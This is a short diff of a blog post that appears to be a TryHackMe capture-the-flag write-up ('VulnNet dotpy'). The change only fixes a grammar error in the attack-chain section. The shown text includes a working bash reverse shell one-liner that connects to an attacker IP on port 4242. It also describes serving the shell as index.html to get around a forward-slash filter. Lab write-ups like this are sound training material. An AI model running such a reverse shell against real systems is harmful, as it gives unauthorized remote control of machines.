GlennToms/glenntoms.github.io/capturetheflag/tryhackme/_posts/2022-03-02-vulnnet-dotpy.md

 ## [04] Attack Chain

 Now having all this information available to us, we're able to start formulating our attack chain.
-1. Create Bash reverse shell and saving it as `index.html`.
+1. Create Bash reverse shell and save it as `index.html`.
 This allows us to download this file without using a forward slash `/`.
 ```bash
 #!/bin/bash
 bash -c 'bash -i >& /dev/tcp/10.8.208.76/4242 0>&1'